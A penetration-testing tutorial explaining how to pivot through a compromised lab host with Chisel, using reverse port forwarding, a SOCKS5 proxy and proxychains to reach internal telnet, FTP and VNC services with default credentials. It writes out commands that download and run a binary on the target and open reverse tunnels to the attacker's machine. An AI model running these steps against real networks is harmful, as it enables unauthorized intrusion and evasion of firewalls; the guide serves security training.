A Detailed Guide on Chisel
Chisel port forwarding is a powerful technique that penetration testers and red teamers commonly use to bypass firewalls and securely access internal services. This guide explores how to use Chisel for tunneling traffic and setting up remote connections through local port forwarding and SOCKS5 proxies in various real-world scenarios.
Table of content
- Introduction to Chisel
- Background of port forwarding
- Establish a connection with the remote host
- Local port forwarding Example – 1
- Local Port forwarding Example – 2
- Establish Connection with SOCKS5 Proxy
- Configure SOCKS5 in proxychains4.conf file
- Banner grabbing of the remote host with proxychains
- Telnet Connection using proxychains
- FTP connection using proxychains
- VNC Viewer connection using proxychains
- Conclusion
Introduction to Chisel
Chisel is an open-sourced tool written in Go (Golang). It mainly helps users pass through firewalls, although it can also provide a secure endpoint into your network. Specifically, it operates as a fast TCP/UDP tunnel, transported over HTTP and secured via SSH. To establish a connection between a remote host and the attacking box, it requires two components: the attacking box, which acts as the server, and the remote host, which acts as the client.
Background of Port forwarding
Port forwarding in a computer network, also known as port mapping of network address transition (NAT), redirects a communication request from one address and port number combination to another while packets traverse a network gateway such as a firewall or a router. It is used to keep unwanted traffic off. A network administrator uses one IP address for all external communications on the internet while dedicating multiple servers with different IPS and ports internally to do various tasks based on organization requirements.
Establish a connection with the remote host
We establish a connection with the remote host using valid credentials. The remote host serves as both a target and a tunneling point for the next hop. If another hop exists, the remote host functions as a routing point. We connect as the pentest user using the SSH protocol, which stands for Secure Socket Shell and transmits data in encrypted form. Once connected, we can view the internal network status, which we can achieve using the following commands.
- -a all interface
- -n show ip address
- -t show tcp connections
- -p show process id/name
ssh pentest@192.168.1.15 netstat -antp
Installation
Chisel installation is straightforward in Kali Linux as it comes with a distribution package. We can install it using the below command.
apt install chisel
Once installed, Chisel port forwarding becomes an indispensable part of any attacker’s toolkit for navigating complex network environments.
Local port forwarding Example – 1
In reverse port forwarding, it allows connecting to remote services hosted in an internal network. Here we are using a chisel utility to achieve our goal. It will require you to go through multiple steps. In the first step, we set up a reverse server in our base machine (Kali) by specifying a port number of 5000.
Once our Chisel server is ready and reverse tunneling is enabled, we must transfer a Chisel binary to the remote host. You can download the Chisel binaries from the official repository based on your system architecture. All the latest binaries are available under the releases tab. As we are testing on a Linux system with AMD64 architecture, we selected the highlighted binary.
Download link: https://github.com/jpillora/chisel/releases
After cloning the repository, it will be saved in the downloads folder in zip file format. Next, we will unzip the file using the gunzip utility. As mentioned earlier, we require to transfer it to the target system to set up a chisel as a client. To transfer the file, we set up a python server in our local system, which will host our file on port 80.
gitclone https://github.com/jpillora/chisel.git gunzip chisel_1.7.7_linux_amd64.gz python3 -m http.server 80
Transferring and Executing Chisel on the Remote Host
We downloaded the Chisel binary into the remote host’s /tmp
directory, where all users have full permissions. Then, we assigned full execution permissions to the binary file. Otherwise, if we don’t grant proper permissions, we cannot execute it, as the default setting assigns only read permission for files downloaded into /tmp
as a low-privileged user. To establish a remote connection, we need both a Chisel server and a Chisel client. The Chisel server is the attacking box, while the Chisel client is the target machine. As we had already set up the server on port 5000, we now establish a connection to it. In this setup, we designate Chisel as the client, specify the server IP address and port number (5000), followed by an accessing port (4444) and the internal HTTP service port on the remote system.
wget 192.168.1.205/ chisel_1.7.7_linux_amd64 chmod 777 chisel_1.7.7_linux_amd64 ./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 R:4444:localhost:8080
Local Port forwarding Example – 2
Alternatively, we can access the internal HTTP service using the attacker’s IP address instead of the loopback interface. To do so, we must install Chisel on the target machine. In this case, we are using an Ubuntu system. Because Chisel is written in Golang, we need to install Golang on the target system using the command below.
apt install golang
Next, we download Chisel from its official repository to install it on the target system. The Go build tool, which aims to replace Makefiles, automates builds for simple Go projects. It creates a dependency graph of all local imports and compiles them in the correct order using the GC Go compiler. The ldflags (linker flags) allow users to pass parameters to the underlying linker in the Go toolchain. Although not mandatory, the -s
and -w
linker flags help reduce binary size. By navigating to the Chisel download folder, we can easily install it using go build.
git clone https://github.com/jpillora/chisel.git apt install golang go build -ldflags="-s -w"
Then we set up a chisel server on port 5000 in the attacking box as in the previous example. In the last example, we accessed it from the attacking box loopback interface, connecting to the service hosted in the remote internal network. This time we will access the HTTP service on port 8888 on the attacker side. Ubuntu machine, our client, will establish a connection with the remote server (192.168.1.205) and port 5000. Once a tunnel is created, it will allow accessing the HTTP service hosted in loopback (127.0.0.1) on remote port 8888.
./chisel client 192.168.1.205:5000 R:8888:localhost:8080
When a connection is established with the chisel server, we can access the HTTP service from the attacking box on port 8888.
Establish Connection with SOCKS5 Proxy
During the internal assessment, we may come across when we compromise a system, and that system is communicating with another system using a different adaptor or a different subnet. It can be checked using ipconfig/ifconfig, where we can view if that system is connected to a different network via a different adapter. In such scenarios, local port forwarding will not work, and we have to identify which ports are open for the outbound traffic. As shown in the screenshot below, we could not establish a connection with the remote host.
To overcome this issue, we have to go through multiple steps. First, we set up a chisel server in the attacking box on port 8000.
Configuring and Using SOCKS5 Proxy for Forwarding
Then we establish a connection with the chisel server from the ubuntu box mentioning remote access on socks proxy. Just like most other proxy types, SOCKS proxies hide the client’s IP address and serve when bypassing geo-restrictions. Unlike HTTP, SOCKS cannot interpret web data. However, they are mainly used to facilitate communication with websites with firewalls and limit regular client access. All communication can be done on SOCKS5 proxy using utilities such as proxychains or proxychain4.
-p: listening port of the server (attacking box)
–socks5: start an internal SOCKS4/SOCKS5 proxy
–reverse: allows reverse port forwarding
We can also access an individual target’s port using the command below. We connect with the server hosted in the Attacking machine and then access the target service via a tunnel.
Also, we can specify socks proxy while setting up the chisel server. In the below example, we have set up a chisel server on port 9001 using the socks5 proxy.
All the above setup is done at the system level, but how will the browser know we want to access HTTP service? So, we configured it in the browser as well. Otherwise, we cannot browse any HTTP or H TTPS services. To do that, we manually configured our browser by navigating settings as proxy SOCKS and a host as loopback interface IP address, 127.0.0.1, and SOCKS version such as SOCKS4 or SOCKS5, which depend on the version we are using. In this example, we are using SOCKS5 and port number 1080. And no proxy for the loopback interface. It can also be done using the foxyproxy addon available in Mozilla Firefox.
Now we can access the services without any issues. We can verify accessing the target HTTP service where the request will send via a proxy.
In situations where traditional forwarding fails due to network segmentation, Chisel port forwarding combined with SOCKS5 proxy can help create dynamic tunnels across subnets.
Configure SOCKS5 in proxychains4.conf file
If proxychains4 is not configured for the socks5 proxy, we can make an entry in its configuration file using any text editor. The configuration file is located in the /etc as proxychains4.conf.
To edit the configuration file, we need to comment socks4 proxy if that is configured by default and add socks5 on the loopback interface with the port number. We can use any port, but in this example, we use port 1080.
Banner grabbing of the remote host with proxychains
Now, let’s grab the banners of ports 21, 23, and 5900. Port 21 corresponds to FTP (File Transfer Protocol), 23 to Telnet, and 5900 to the VNC server. FTP helps transfer files, while Telnet allows remote CLI-based connections, and VNC supports GUI-based remote connections. To grab these banners or access the remote host, we must use proxychains before running any commands so that the request is routed through the tunnel we established. From the output, it’s clear that all three ports are open. In our command, we used the -zvn
options, which stand for:
- -n Do not do DNS or service lookups on specified addresses, hostnames, or ports.
- -v Have nc give more verbose output.
- -z Specifies that nc should only scan for listening daemons without sending any data to them.
proxychains nc -zvn 192.168.146.128 21 23 5900
Telnet Connection using proxychains
Telnet is a remoting protocol that does not encrypt the data while transmitting. It transmits data in a plain text format. Let’s establish a telnet connection with valid credentials msfadmin/msfadmin. As expected, we successfully established a remote connection with the remote host using telnet protocol.
proxychains telnet 192.168.146.128
FTP connection using proxychains
FTP (File Transfer Protocol) is a network protocol for transmitting files between computers over Transmission Control Protocol/Internet Protocol (TCP/IP) connections. Within the TCP/IP suite, FTP is considered an application layer protocol. Let’s connect with the same credentials we used in telnet. We connected to ftp successfully, and with ls command, we can list the available file in the directory.
proxychains ftp 192.168.146.128
VNC Viewer connection using proxychains
In the last example, we will connect with the VNC viewer. VNC Viewer is used for local computers and mobile devices you want to control from. A device such as a computer, tablet, or smartphone with installed VNC Viewer software can access and control a computer in another location. This service runs in its default port, 5900. To establish a connection with VNC, we can use proxychains using the vncviewer utility and the remote IP address, and we will receive a GUI-based interface.
proxychains vncviewer 192.168.146.128
Conclusion
We have explored chisel briefly, which will make our Internal assessment much easier, especially when we come across port forwarding. We have explored multiple techniques to establish a remote session using a chisel with and without socks5 proxy. Also, we have explored proxychains role in a tunneled connection. I hope you have learned something new today. Happy hacking!
Author: Subhash Paudel is a Penetration Tester and a CTF player who has a keen interest in various technologies and loves to explore more and more. Additionally, he is a technical writer at Hacking articles. Contact here: Linkedin and Twitter